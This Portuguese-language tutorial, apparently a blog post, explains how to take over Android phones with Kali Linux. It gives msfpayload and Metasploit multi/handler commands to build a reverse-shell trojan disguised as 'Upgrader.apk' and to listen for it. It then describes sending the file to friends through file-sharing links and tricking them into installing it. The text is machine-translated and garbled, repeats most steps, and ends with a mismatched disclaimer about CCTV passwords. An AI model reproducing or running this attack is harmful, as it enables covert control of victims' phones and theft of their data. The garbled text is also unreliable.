Este é um tutorial explicando como hackear telefones Android com Kali.
Passo 1: Fogo-Up Kali:
Abra um terminal, e fazer um .apk Trojan
Você pode fazer isso digitando:
msfpayload android / meterpreter / reverse_tcp LHOST = 192.168.0.4 R> /root/Upgrader.apk (substitua LHOST com seu próprio IP)
Você também pode cortar android em WAN ou seja, através Interet usando sua Pública / IP externo no LHOST e pelo encaminhamento de porta (pergunte-me sobre o encaminhamento de porta se você tiver problemas na seção de comentários)
Passo 2: Abra Outro Terminal:
Abra outro terminal até que o arquivo está sendo produzido.
Carregue consola metasploit, digitando: msfconsole
Passo 3: Set-Up um ouvinte:
Passo 4: Exploit!
No último tipo: explorar para iniciar o ouvinte.
Copie o aplicativo que você fez (Upgrader.apk) a partir da pasta de raiz, para que você telefone android.
Em seguida, enviá-lo usando o upload para Dropbox ou qualquer site de compartilhamento (como: www.speedyshare.com).
Em seguida, enviar o link que o site deu-lhe a seus amigos e explorar seus telefones (Somente em LAN, mas se você usou o método WAN então você pode usar o exploit em qualquer lugar na Internet)
Deixe a vítima instalar o app Upgrader (como ele poderia pensar que se destina a melhorar algumas características em seu telefone)
No entanto, a opção de subsídio para a instalação de aplicativos de fontes desconhecidas deve ser ativado (se não) a partir das definições do telefone android de segurança para permitir que o cavalo de Tróia para instalar.
E quando ele clica Open ...
Abra um terminal, e fazer um .apk Trojan
Você pode fazer isso digitando:
msfpayload android / meterpreter / reverse_tcp LHOST = 192.168.0.4 R> /root/Upgrader.apk (substitua LHOST com seu próprio IP)
Você também pode cortar android em WAN ou seja, através Interet usando sua Pública / IP externo no LHOST e pelo encaminhamento de porta (pergunte-me sobre o encaminhamento de porta se você tiver problemas na seção de comentários)
Abra outro terminal até que o arquivo está sendo produzido.
Carregue consola metasploit, digitando: msfconsole
Passo 3: Set-Up um ouvinte:
Depois de carregar (isso vai levar tempo), carregue o multi-manipulador explorar digitando: uso explorar / multi / handler
Configurar um (reverso) de carga útil, digitando: set carga android / meterpreter / reverse_tcp
Para definir L tipo de host: defina 192.168.0.4 LHOST (Mesmo se você está cortando em WAN digite seu IP privado / interno aqui não o público / externo)
No último tipo: explorar para iniciar o ouvinte.
Copie o aplicativo que você fez (Upgrader.apk) a partir da pasta de raiz, para que você telefone android.
Em seguida, enviá-lo usando o upload para Dropbox ou qualquer site de compartilhamento (como: www.speedyshare.com).
Em seguida, enviar o link que o site deu-lhe a seus amigos e explorar seus telefones (Somente em LAN, mas se você usou o método WAN então você pode usar o exploit em qualquer lugar na Internet)
Deixe a vítima instalar o app Upgrader (como ele poderia pensar que se destina a melhorar algumas características em seu telefone)
No entanto, a opção de subsídio para a instalação de aplicativos de fontes desconhecidas deve ser ativado (se não) a partir das definições do telefone android de segurança para permitir que o cavalo de Tróia para instalar.
E quando ele clica Open ...
Passo 5: BOOM!
Lá vem o prompt meterpreter:
Este artigo é somente para fins de educação. Objectivo destes artigo é que como pode proteger câmeras de CCTV usando senhas fortes. Não usar para outra finalidade criminosa ou arte negra.
